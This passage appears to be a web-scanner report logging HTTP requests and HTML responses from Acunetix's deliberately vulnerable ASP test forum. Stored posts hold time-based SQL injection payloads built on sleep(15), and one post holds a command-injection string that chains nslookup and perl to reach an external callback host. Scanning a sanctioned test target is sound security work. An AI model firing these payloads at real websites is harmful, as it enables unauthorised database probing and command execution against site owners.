SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=56 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4246 |
Response Body - size: 4,246 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=57 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4246 |
Response Body - size: 4,246 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:22 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=58 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4468 |
Response Body - size: 4,468 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:23 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=59 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1'" </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1'" </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:38 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1'" - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4317 |
Response Body - size: 4,317 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>&(nslookup hitgvavrmebey35980.bxss.me||perl -e "gethostbyname('hitgvavrmebey35980.bxss.me')")&'\"`0&(nslookup hitgvavrmebey35980.bxss.me||perl -e "gethostbyname('hitgvavrmebey35980.bxss.me')")&`'</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=60 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4120 |
Response Body - size: 4,120 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:42 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=61 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4138 |
Response Body - size: 4,138 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum @@NiQ6e </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/@@NiQ6e </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>@@NiQ6e - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> 